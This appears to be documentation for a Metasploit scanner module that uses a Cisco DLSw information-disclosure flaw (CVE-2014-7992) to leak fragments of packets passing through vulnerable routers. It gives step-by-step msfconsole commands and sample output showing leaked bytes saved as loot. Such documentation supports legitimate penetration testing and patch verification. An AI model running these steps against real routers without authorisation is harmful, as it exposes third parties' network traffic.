1.2 KiB
1.2 KiB
Vulnerable Application
This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.
Verification Steps
- Start msfconsole
- Do:
use modules/auxiliary/scanner/dlsw/dlsw_leak_capture - Do:
set RHOSTS [ip] - Do:
run
Scenarios
IOS version 12.4(8) and Kali Linux 2019.3
msf > use modules/auxiliary/scanner/dlsw/dlsw_leak_capture
msf auxiliary(scanner/dlsw/dlsw_leak_capture) > set RHOSTS 192.168.0.1
RHOSTS => 192.168.0.1
msf auxiliary(scanner/dlsw/dlsw_leak_capture) > run
[*] 192.168.0.1:2067 - Checking for DLSw information disclosure (CVE-2014-7992)
[+] 192.168.0.1:2067 - Vulnerable to DLSw information disclosure; leaked 72 bytes
[*] 192.168.0.1:2067 - DLSw leaked data stored in /root/.msf4/loot/20191124231804_default_192.168.0.1_dlsw.packet.cont_518857.bin
[*] 192.168.0.1:2067 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed